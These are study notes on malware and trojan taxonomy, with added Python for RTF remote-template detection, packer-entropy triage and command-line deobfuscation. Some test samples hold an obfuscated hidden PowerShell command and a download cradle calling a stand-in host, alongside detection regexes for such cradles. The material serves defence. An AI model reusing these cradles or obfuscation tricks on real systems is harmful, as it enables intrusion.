Malware
Malicious software that damages or disables computer systems and gives limited or full control of the systems to the malware creator
Ways for Malware to Enter the System
- Instant Messenger Applications
- Portable Hardware Media/Removable Devices
- Browser and Email Software Bugs
- Insecure Patch Management
- Rogue/Decoy Applications
- Untrusted Sites and Free Web Applications/Software
- Downloading Files from the Internet
- Email Attachments
- Network Propagation
- File Sharing
- Installation by other Malware
- Bluetooth and Wireless Networks
Autorun/Autoplay/Autostart
A Windows feature that automatically runs the program named in an autorun.inf file when a user connects removable media such as a USB device or memory card. It was a classic malware propagation vector; modern Windows versions disable AutoRun for non-optical removable media by default, so it should be treated as a legacy risk on unpatched or misconfigured hosts.
Techniques Attackers Use to Distribute Malware on the Web
- Black Hat Search Engine Optimization (SEO)
- Social Engineered Click Jacking
- Spear Phishing Sites
- Malvertising
- Compromised Legitimate Websites
- Drive-by-Downloads
- Spam Email
- Rich Text Format (RTF) Injection
Black Hat Search Engine Optimization (SEO)
Uses SEO tactics to get higher search engine rankings for malware pages
Social Engineered Click Jacking
Attackers inject malware into websites that appear legitimate to trick users into clicking them. When clicked the malware embedded in the link executes.
Spear Phishing Sites
This technique is used for mimicking legitimate institutions, such as banks, to steal passwords, credit card and bank account data, and other sensitive information.
Malvertising
Involves embedding malware-laden advertisements in legitimate online advertising channels to spread malware on systems of unsuspecting users
Drive By Downloads
Refers to the unintentional downloading of software via the Internet. Here, an attacker exploits flaws in browser software to install malware by merely visiting a website.
Spam Emails
The attacker attaches a malicious file to an email; the victim is tricked into opening the attachment, which executes the malware.
RTF Templates
An RTF document can reference an external document template (the \*\template control word) that Microsoft Word loads when the file is opened; the template, not the RTF file, can carry macros.
Rich Text Format (RTF) Injection
Attackers rewrite the template reference inside an RTF file so that it points to a URL on a server they control. When the user opens the document, Word silently retrieves the remote template, which carries the malicious macros or exploit. Because the RTF file itself contains no macro and no payload, it often passes email and antivirus scanning.
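The check an analyst would run on a suspicious RTF attachment is to look at the \*\template destination and decide whether it points off the local machine. The following is an added example (not code from the original flashcards or from any vendor): it resolves the \'hh hex escapes and \uNNN? unicode escapes attackers use to hide the URL from string scanners, then flags any template reference that is a URL or a UNC path. The two RTF documents are constructed samples, and the 192.0.2.10 address is a documentation address, not a real server.

```python
import re

# {\*\template <path-or-url>} is the RTF destination that names the attached document template.
TEMPLATE_RE = re.compile(rb"\{\\\*\\template\s+([^}]*)\}", re.IGNORECASE)
HEX_ESC_RE = re.compile(rb"\\'([0-9a-fA-F]{2})")       # \'hh  -> byte 0xhh
UNI_ESC_RE = re.compile(rb"\\u(-?\d+)\s?\??")           # \uNNN? -> code point NNN (common '?' fallback char)
REMOTE_RE = re.compile(r"(?i)(?:https?|ftp|file)://|\\\\")  # URL scheme or a UNC path (\\server\share)


def decode_rtf_text(raw: bytes) -> str:
    """Resolve the escapes attackers use to hide a URL from string-based scanners."""
    def uni(m):
        code = int(m.group(1))
        if code < 0:                      # RTF stores code points above 32767 as negative 16-bit values
            code += 65536
        return chr(code).encode("utf-8")
    out = UNI_ESC_RE.sub(uni, raw)
    out = HEX_ESC_RE.sub(lambda m: bytes([int(m.group(1), 16)]), out)
    out = out.replace(b"\\\\", b"\\")    # RTF escapes a literal backslash as \\
    return out.decode("utf-8", errors="replace").strip()


def remote_templates(rtf: bytes) -> list:
    """Return every template reference in the document that points off the local machine."""
    hits = []
    for m in TEMPLATE_RE.finditer(rtf):
        target = decode_rtf_text(m.group(1))
        if REMOTE_RE.match(target):
            hits.append(target)
    return hits


# Constructed samples (not real documents). The benign file references a local Normal.dotm;
# the injected one hides its URL with a hex escape ("\'74" = "t") and a unicode escape ("\u49?" = "1").
BENIGN_RTF = rb"{\rtf1\ansi\deff0{\*\template C:\\Users\\alice\\Templates\\Normal.dotm}{\fonttbl{\f0 Calibri;}}\f0 Quarterly report\par}"
INJECTED_RTF = rb"{\rtf1\ansi\deff0{\*\template h\'74tp://\u49?92.0.2.10/invoice.dotm}{\fonttbl{\f0 Calibri;}}\f0 Quarterly report\par}"

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_RTF), ("injected", INJECTED_RTF)):
        print(label, remote_templates(doc))
```

The same test applies to OOXML documents, where the attached template lives in word/_rels/settings.xml.rels as a relationship with TargetMode="External"; a local path there is normal, an http:// target is not. This checker only covers the template destination and the two escape forms shown; it does not parse embedded OLE objects (\objdata), which need separate handling.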
Components of Malware
- Crypter
- Downloaders
- Dropper
- Exploit
- Injector
- Obfuscator
- Packer
- Payload
- Malicious Code
Crypter
Encrypts the malware and wraps it in a small decryption stub so that signature-based antivirus does not recognize the stored file; the stub decrypts and runs the original in memory. It also hinders reverse engineering and static analysis.
Downloader
A type of trojan which downloads other malware
Dropper
A covert carrier of malware: an executable with the real malware embedded inside it. When the victim runs the dropper it writes the embedded payload to disk (or loads it straight into memory) and launches it, so the payload never has to be downloaded or transferred separately and can slip past antivirus scanners that only inspect the outer file.
Exploit
Part of malware which contains code or commands that take advantage of a bug or vulnerability
Injector
Program injects exploits or malicious code available in the malware into other vulnerable running processes
Obfuscator
Conceals malicious code making it difficult for security mechanisms to detect or remove it
Packer
Compresses (and often encrypts) the malware executable into a form that static scanners cannot read; a small stub unpacks it in memory at run time
Payload
The component that performs the malware's intended malicious activity once it runs (stealing data, encrypting files, opening a backdoor, etc.)
Malicious Code
A piece of code that defines the basic functionality of the malware and comprises commands that result in security breaches
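Packers and crypters leave a measurable trace: compressed or encrypted sections have byte entropy close to the 8.0 bits/byte maximum, while native code and strings sit well below it. The following is an added example (not from the original flashcards or any tool) of the triage an analyst runs on a binary's sections; the section list is constructed inline to stand in for a PE file, the 7.0 threshold is a common rule of thumb, and the packer section-name list is illustrative, not exhaustive.

```python
import math
from collections import Counter

PACKED_THRESHOLD = 7.0   # bits per byte; compressed/encrypted data sits near 8.0, ordinary x86 code around 5-6.5
# Section names commonly left behind by packers/protectors (illustrative list, not exhaustive)
KNOWN_PACKER_SECTIONS = {"UPX0", "UPX1", "UPX2", ".aspack", ".adata", ".themida", ".vmp0", ".vmp1"}


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for a uniform one."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def analyse_sections(sections, threshold=PACKED_THRESHOLD):
    """sections: iterable of (name, raw_bytes). Returns the facts an analyst triages on."""
    report = {"entropy": {}, "high_entropy": [], "packer_names": []}
    for name, raw in sections:
        h = round(shannon_entropy(raw), 2)
        report["entropy"][name] = h
        if h >= threshold:                 # looks compressed or encrypted
            report["high_entropy"].append(name)
        if name in KNOWN_PACKER_SECTIONS:  # the packer did not even bother to rename its sections
            report["packer_names"].append(name)
    report["likely_packed"] = bool(report["high_entropy"] or report["packer_names"])
    return report


# Constructed sections standing in for a PE file (no real binary is embedded):
SAMPLE_SECTIONS = [
    (".text", b"\x55\x8b\xec\x83\xec\x10" * 600),           # repetitive prologue bytes: low entropy
    (".rdata", b"Hello from a benign program\x00" * 100),   # plain strings: low entropy
    ("UPX1", bytes(range(256)) * 16),                       # every byte value equally often: 8.0
]

if __name__ == "__main__":
    print(analyse_sections(SAMPLE_SECTIONS))
```

On a real file the sections come from a PE parser, e.g. with the pefile library: `[(s.Name.rstrip(b"\0").decode(), s.get_data()) for s in pefile.PE(path).sections]`. Entropy is a triage signal, not proof: installers, .NET assemblies and embedded resources also carry compressed data, and a crypter that stores its payload in a low-entropy encoding will not trip this check.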
Potentially Unwanted Applications/ Programs (PUAs/PUPs)/Grayware/Junkware
Potentially harmful applications that may pose severe risks to the security and privacy of data stored in the system where they are installed. PUAs can degrade system performance and compromise privacy and data security. Most PUAs get installed when downloading and installing freeware using a third-party installer or when accepting a misleading license agreement.
Types of Potentially Unwanted Applications/ Programs (PUAs/PUPs)
- Adware
- Torrent
- Marketing
- Cryptomining
- Dialers
Adware
Display unsolicited advertisements, sales offers and pop-ups for online services while the user browses websites
Marketing PUAs/PUPs
Monitor the online activities performed by users and send browser details and information regarding personal interests to third-party app owners. These applications then market products and resources based on users' personal interests.
Cryptomining
Use the victim's CPU/GPU time and electricity, without consent, to mine cryptocurrencies such as Bitcoin for the attacker; the user sees degraded performance and higher power use
Dialers
Programs that install and configure themselves to dial premium-rate or long-distance numbers (e.g., over a modem) without the user's consent. Dialers run up large telephone bills and are often hard to locate and remove.
Indicators of Adware
- Frequent System Lag
- Constant, intrusive advertisements
- Incessant System Crash
- Disparity in the Default Browser Homepage
- Presence of New Toolbar or Browser Add-Ons
- Slow Internet
- Unusual Network Traffic
- Difficulty Removing Unwanted Software
- Unauthorized Data Collection
Advanced Persistent Threat (APT)
A type of network attack whereby an attacker gains unauthorized access to a target network and remains in the network without being detected for a long time
Characteristics of APTs
- Objectives
- Timeliness
- Resources
- Risk Tolerance
- Skills and Methods
- Actions
- Attack Origination Points
- Numbers Involved in the Attack
- Knowledge Source
- Multi-Phased
- Tailored to the Vulnerabilities
- Multiple Points of Entries
- Evading Signature-Based Detection Systems
- Specific Warning Signs
- Highly Targeted
- Long-Term Engagement
- Use of Advanced Techniques
- Complex Command and Control (C2) Infrastructure
APT Lifecycle Phases
- Preparation
- Initial Intrusion
- Expansion
- Persistence
- Search and Exfiltration
- Cleanup
Trojan
A program in which malicious or harmful code is contained inside an apparently harmless program or data
Types of Trojans
- Remote Access Trojans
- Backdoor Trojans
- Botnet Trojans
- Service Protocol Trojans
- Mobile Trojans
- IoT Trojans
- Rootkit Trojans
- Security Software Disabler Trojans
- E-Banking Trojans
- Destructive Trojans
- Point-of-Sale Trojans
- Defacement Trojans
- DDoS Attack Trojans
- Command Shell Trojans
Remote Access Trojans (RATs)
Provides attackers with full control over the victim's system, thereby enabling them to remotely access files, private conversations, accounting data, etc
Backdoor Trojans
A program that can bypass the standard system authentication or conventional system mechanisms such as IDS and firewalls, without being detected. In these types of breaches, hackers leverage backdoor programs to access the victim's computer or network.
Botnet Trojans
Attackers use botnet Trojans to infect a large number of computers across a wide geographical area, creating a network of bots (a "bot herd") controlled from a command-and-control (C&C) center. Once the user downloads and executes the Trojan, it connects back to the attacker (classically over IRC channels; today more often over HTTP/HTTPS) and waits for further instructions.
Rootkit Trojans
Backdoors that attack the OS at root/kernel level, hooking or patching system components so that the malware's files, processes and network connections are hidden from the user and from security tools
E-Banking Trojans
They intercept the victim's account information before the browser encrypts it (i.e., before it enters the TLS session) and send it to the attacker's command-and-control center. Attackers configure these Trojans with minimum and maximum amounts to steal, so that they do not empty the account and arouse suspicion.
Transaction Authentication Number (TAN)
A single-use password for authenticating online banking transactions
TAN Grabber
Banking Trojans intercept valid TANs entered by users and replace them with random numbers. The bank will reject such invalid random numbers. Subsequently, the attacker misuses the intercepted TAN with the target's login details.
HTML Injection
The Trojan creates fake form fields on e-banking pages, thereby enabling the attacker to collect the target's account details, credit card number, date of birth, etc. The attacker can use this information to impersonate the target and compromise his/her account.
Form Grabber
A type of malware that captures a target's sensitive data from a web browser form. It intercepts POST requests and responses inside the victim's browser, before they are encrypted. It can defeat scramble-pad authentication by intercepting the scramble-pad input as the user enters his/her Customer Number and Personal Access Code.
Covert Credential Grabber
Once the user attempts to make an online transaction, the Trojan covertly steals the login credentials and transmits them to the hacker
Components of E-Banking Trojans
- TAN Grabber
- HTML Injection
- Form Grabber
- Covert Credential Grabber
Point of Sale (POS) Trojans
A type of financial fraudulent malware that target POS and payment equipment such as credit card/debit card readers
Defacement Trojans
Can destroy or change the entire content of a database
Service Protocol Trojans
Take advantage of vulnerable service protocols
Types of Service Protocol Trojans
- VNC
- HTTP/HTTPS
HTTP/HTTPS Trojan
Creates a local shell on the victim's computer and tunnels it to a web server the attacker owns inside ordinary outbound HTTP(S) requests, which most firewalls allow
Mobile Trojans
Target mobile phones
Internet of things (IoT)
The inter-networking of physical devices, buildings, and other items embedded with electronics
IoT Trojans
Malicious programs that attack IoT devices and networks (see the IoT definition above), for example to enlist the devices into botnets
Security Software Disabler Trojans
Stop security programs by disabling them or killing the processes
Destructive Trojans
Delete files on target system
DDoS Attack Trojans
Intended to perform DDoS attacks. The Trojan turns the victim into a zombie that listens for commands from a DDoS server on the Internet. Many infected systems stand by for a command; when the server issues it to all or a group of them, they all flood the target with requests simultaneously, and the service stops responding.
Command Shell Trojans
Provide a remote control command shell on the victim's machine
Steps to Infecting a Machine via a Trojan
1. Create a new Trojan packet
2. Employ a dropper or downloader to install the malicious code on the target system
3. Employ a wrapper to bind the Trojan executable with legitimate files
4. Employ a crypter to encrypt the trojan to evade detection
5. Propagate the trojan
6. Deploy the trojan on victim's machine by executing the dropper or downloading software
7. Execute damage routine
Overt
Something explicit, obvious, or evident
Covert
Something hidden or concealed
Overt Channel
A legal channel for the transfer of data or information in a company network, and it works securely to transfer data and information
Covert Channel
An unauthorized, hidden path for transferring data out of a network, using a mechanism that was never designed to carry that data (e.g., timing, or unused protocol fields)
Exploit Kit/Crimeware Toolkit
Used to exploit security loopholes found in software application by delivering malware to the target system
Viruses
Self-replicating programs that attach themselves to other programs or files and spread when a user runs or opens the infected host; unlike worms, they need user interaction to propagate
Stages of Virus Lifecycle
1. Design
2. Replication
3. Launch
Virus Phases
- Infection Phase
- Attack Phase
Virus Methods of Infecting
- Downloads
- Email Attachments
- Pirated software
- Failing to install security software
- Failing to update software
- Browser vulnerabilities
- Missing or misconfigured firewall
- Popups
- Removable Media
- Network Access
- Backup and Restore
- Malicious Online Ads
- Social Media
Types of Viruses
- System or boot sector
- File
- Multipartite
- Macro
- Cluster
- Stealth/Tunneling
- Encryption
- Sparse Infector
- Metamorphic
- Overwriting File or Cavity
- Companion/Camouflage
- Shell
- File Extension
- FAT
- Logic Bomb
- Web Scripting
- Armored
- Add-On
- Intrusive
- Direct Action or Transient
- Terminate and Stay Resident (TSR)
File Viruses
File viruses insert their code into the original file and infect executable files
Multipartite Virus
Combines the approach of file and boot record infectors
Cluster Viruses
They infect files without changing the file or planting additional files. They save the virus code to the hard drive and overwrite the pointer in the directory entry, directing the disk read point to the virus code instead of the actual program.
Stealth/Tunneling Viruses
Try to hide from antivirus programs by intercepting the OS service call interrupts (disk and file-system calls) and returning clean data, so the scanner sees the uninfected version of the file or boot sector while the virus is running
Sparse Infector
Infect less often (e.g., only every Nth execution or only files of a certain size) to minimize the probability of discovery
Metamorphic Viruses
Programmed such that they rewrite themselves completely each time they infect a new executable file
Overwriting File or Cavity Viruses
Overwriting viruses replace part of the host file's code with their own; cavity viruses write themselves into unused (e.g., null-padded) regions of the host file. In both cases the file length does not change, which defeats simple size checks.
Companion/Camouflage Virus
Stores itself with the same filename as the target program file
File Extension Virus
Changes extension of files
File Allocation Table (FAT) Virus
The FAT is a system used in Microsoft products and some other types of computer systems to access the information stored on a computer. FAT Viruses attack the index making it impossible for the computer to locate files.
Logic Bomb
Virus Triggered in Response to an Event
Types of Web Scripting Viruses
- Persistent
- Non-Persistent
Armored Viruses
Designed to confuse or trick deployed antivirus systems to prevent them from detecting the actual source of the infection
Anti-Emulation Techniques
Used to avoid dynamic analysis by fingerprinting the emulated system environment
Anti-Goat Techniques
Use heuristic rules to detect possible goat files such as a virus that cannot infect a file if it is too small or if it contains a large amount of do-nothing instructions.
Direct Action/Transient Viruses
Run only when the infected host program is executed: they infect other files on the spot and then hand control back to the host program, without staying resident in memory.
Terminate and Stay Resident (TSR) Virus
Remains permanently in the target machine's memory during an entire work session, even after the target host's program is executed and terminated.
Virus Hoaxes
False alarms claiming reports about a non-existent virus; the warning message itself may carry malicious attachments
Fake Antivirus
Malware designed to imitate legitimate security software, thereafter stealing information from unsuspecting users
Ransomware
A type of malware that restricts access to the infected computer system or critical files and documents stored on it, and then demands an online ransom payment to the malware creator(s) to remove user restrictions.
Worms
Are standalone malicious programs that replicate, execute, and spread across network connections independently without human intervention
Fileless Malware
Malware that operates in memory without writing a malicious executable to disk: it abuses legitimate software, applications, scripting engines and protocols already present in the system (e.g., PowerShell, WMI) to perform its malicious activities.
Benefits of Fileless Malware
- Stealth
- Living off the Land (LOL)
- Trustworthy
- Persistence without files
- Simplify infection process
- Increased success rate in target attacks
- Complicating forensic analysis and incident response
Living off the Land
Exploit techniques that use standard system tools and packages to perform intrusions
Types of Fileless Malware
- Type 1: No file Activity Performed
- Type 2: Indirect File Activity
- Type 3: Required Files to Operate
Fileless Malware Stages
1. Point of Entry: Memory Exploits, Malicious Websites, Phishing Email/Malicious Document
2. Code Execution: Code Injection, Script-Based Injection
3. Persistence: Windows Registry, Windows Management Instrumentation (WMI), Windows Task Scheduler
4. Achieving Objectives
Obfuscation techniques used by fileless malware to bypass antivirus solutions
- Inserting characters, parentheses, caret symbols, and double quotes
- Using custom and pre-assigned environment variables
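The two obfuscation techniques above are aimed at command-line signatures: `p^o^w^e^r^s^h^e^l^l`, `"p""o""w"` and `%COMSPEC:~-16,1%` all produce the string `powershell` when cmd.exe parses them, but none of them contains it. The following is an added example (not code from the original flashcards or from any product) of the normalisation a detection pipeline applies before matching: it harvests `set x=...` variables from the same line, expands `%VAR%` and `%VAR:~start,len%` with cmd.exe substring semantics, strips carets, quotes and parentheses, then runs a few illustrative indicators over the result. The two command lines and the COMSPEC value are constructed samples; the indicator regexes are examples, not a complete rule set.

```python
import re

# %VAR%, %VAR:~start%, %VAR:~start,len%  (cmd.exe substring expansion of pre-assigned/custom variables)
ENV_RE = re.compile(r"%(\w+)(?::~(-?\d+)(?:,(-?\d+))?)?%")
# attacker-defined variables on the same line:  set x=value   or   set "x=value"
SET_RE = re.compile(r'\bset\s+"?(\w+)=([^"&|]*)', re.IGNORECASE)

# Indicators evaluated on the normalised command line (illustrative, not a complete rule set)
INDICATORS = {
    "powershell_encoded": re.compile(r"powershell\b.*\s-(?:e|ec|enc|encodedcommand)\b", re.IGNORECASE),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
    "download_cradle": re.compile(r"Net\.WebClient|DownloadString|Invoke-WebRequest|\biwr\b|certutil.*-urlcache",
                                  re.IGNORECASE),
}


def cmd_substring(value: str, start: int, length) -> str:
    """Mimic %VAR:~start,len%: a negative start counts from the end, a negative len trims from the end."""
    if start < 0:
        start = max(len(value) + start, 0)
    if length is None:
        return value[start:]
    if length < 0:
        return value[start:len(value) + length]
    return value[start:start + length]


def expand_env(cmdline: str, env: dict) -> str:
    def repl(m):
        name, start, length = m.groups()
        value = env.get(name.upper())
        if value is None:
            return m.group(0)             # unknown variable: leave it visible for the analyst
        if start is None:
            return value
        return cmd_substring(value, int(start), None if length is None else int(length))
    return ENV_RE.sub(repl, cmdline)


def deobfuscate(cmdline: str, env: dict = None) -> str:
    env = {k.upper(): v for k, v in (env or {}).items()}
    # 1. harvest variables the attacker defines on the same line (set x=power&&call %x%shell)
    for name, value in SET_RE.findall(cmdline):
        env[name.upper()] = value
    # 2. expand %VAR% / %VAR:~s,l% references against the collected environment
    out = expand_env(cmdline, env)
    # 3. drop cmd.exe escape carets (^p^o^w -> pow), empty-string quotes ("p""o" -> po) and parentheses
    out = re.sub(r"\^(.)", r"\1", out)
    out = out.replace('"', "").replace("(", "").replace(")", "")
    # 4. collapse whitespace so the result is a stable input for signatures
    return re.sub(r"\s+", " ", out).strip()


def analyse(cmdline: str, env: dict = None):
    """Return (normalised command line, names of the indicators that matched it)."""
    norm = deobfuscate(cmdline, env)
    return norm, [name for name, rx in INDICATORS.items() if rx.search(norm)]


# Constructed samples. COMSPEC is a pre-assigned variable; character 11 of this value is "s".
ENV = {"COMSPEC": r"C:\Windows\system32\cmd.exe"}
OBF1 = 'c^m^d /c "p""o""w""e""r"%COMSPEC:~-16,1%hell -nop -w hidden -enc AAAA'
OBF2 = ('set "ps=power"&&call %ps%shell -w hidden -c '
        "IEX(New-Object Net.WebClient).DownloadString('http://example.invalid/x')")

if __name__ == "__main__":
    for line in (OBF1, OBF2):
        print(analyse(line, ENV))
```

This is a normaliser for detection, not a cmd.exe emulator: stripping quotes changes argument boundaries, `%VAR:str=repl%` substitution and delayed `!var!` expansion are not handled, and the `set` harvesting ignores the order of evaluation. Those gaps are acceptable because the goal is a stable string to match signatures against, and an attacker who defeats the normaliser still has to leave the real `powershell.exe` process creation in the endpoint telemetry.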
AI Based Malware
Refers to malicious software that harnesses AI methodologies and algorithms to amplify its functionalities and accomplish goals
Phases of AI Based Malware
1. Infiltration
2. Establishment
3. Learning Phase
4. Adaptation
5. Execution
6. Propagation
7. Evolution
Generative Adversarial Networks (GANs)
Used for generating new data that is similar to but distinct from the data on which they were trained
Natural Language Processing (NLP)
Focuses on the interaction between computers and humans through natural language. The primary goal of NLP is to enable computers to understand, interpret, and generate human languages in a valuable way.
Sheep dipping
Refers to analysing suspicious files, incoming messages, removable media, etc. for malware on a dedicated machine. The sheep-dip computer is isolated from the rest of the network so that any malware it finds cannot spread to other systems.